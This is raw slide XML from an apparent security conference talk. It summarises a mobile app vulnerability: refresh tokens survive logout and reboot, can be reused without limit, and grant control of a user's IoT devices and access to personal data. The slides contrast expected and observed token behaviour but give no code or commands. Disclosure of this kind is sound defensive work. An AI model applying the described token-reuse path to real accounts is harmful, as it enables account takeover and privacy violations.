                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>erişim kontrolü uygular</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> (RBAC, ABAC)</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Yetkisiz erişimi önler</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>, veri sızıntısını engeller</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SAML, OAuth, OIDC</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> gibi protokollerle entegre çalışır</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Bulut ve yerel sistemlerde merkezi yönetim</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> sunar</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Google Shape;225;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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661600" y="812675"/>
            <a:ext cx="9459900" cy="7926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1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>⚙️ Technical Background</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>✅ Expected Secure Behavior</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Refresh tokens should expire shortly after logout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Tokens should be single-use only</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App should enforce device-specific binding (e.g., IP, DeviceID)</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Rate limits should be in place for sensitive operations</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>❌ Observed Weak Behavior</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1750">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>refreshToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> remains valid post-logout and post-reboot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Tokens are reusable an unlimited number of times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Full API access is possible without any re-authentication</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Google Shape;231;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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463150" y="841975"/>
            <a:ext cx="8520600" cy="7926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1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>📌 Summary</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The mobile app failed to invalidate session refresh tokens after logout or device reboot. This allowed:</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Unlimited reuse of refresh tokens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Persistent validity even after logout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Generation of new access tokens (accessKey, secretKey, sessionToken)</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Full control over the user's connected IoT devices and home data</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Sensitive Data Information Disclosure (e.g,mail, phone number, Geolocation coordinates (latitude and longitude</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Google Shape;237;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descr="free cybersecurity PowerPoint templates" id="90" name="Google Shape;90;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9158636" cy="5156171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Google Shape;91;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="687760" y="303247"/>
            <a:ext cx="2628900" cy="692100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="3900"/>
              <a:buFont typeface="Nunito Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="3900" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Nunito Sans"/>
                <a:ea typeface="Nunito Sans"/>
                <a:cs typeface="Nunito Sans"/>
                <a:sym typeface="Nunito Sans"/>
              </a:rPr>
              <a:t>Who am I?</a:t>
            </a:r>
            <a:endParaRPr sz="3900">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="DEF CON RED TEAM VILLAGE" id="92" name="Google Shape;92;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537763" y="811756"/>
            <a:ext cx="2068478" cy="2068478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Google Shape;93;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411625" y="1403975"/>
            <a:ext cx="2690100" cy="1217100"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj1"/>
              <a:gd fmla="val 0" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="dk1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="127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94" name="Google Shape;94;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556400" y="1511825"/>
            <a:ext cx="3213000" cy="992700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5870225" y="1404025"/>
            <a:ext cx="2893800" cy="1100400"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj1"/>
              <a:gd fmla="val 0" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="dk1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="127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96" name="Google Shape;96;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5870225" y="1546975"/>
            <a:ext cx="3694800" cy="808200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="00FF00"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>*****</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Google Shape;97;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1953712" y="3204725"/>
            <a:ext cx="4827300" cy="992700"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj1"/>
              <a:gd fmla="val 0" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="dk1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="127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98" name="Google Shape;98;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2137009" y="3287369"/>
            <a:ext cx="5067900" cy="8082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FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Bachelor: ***** </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF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FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Master: *****</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF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FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Cert.: *, *, *, *, * </a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF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FF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>other cyber security certifications and more etc.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Google Shape;99;p16"/>
          <p:cNvSpPr txBox="1"/>
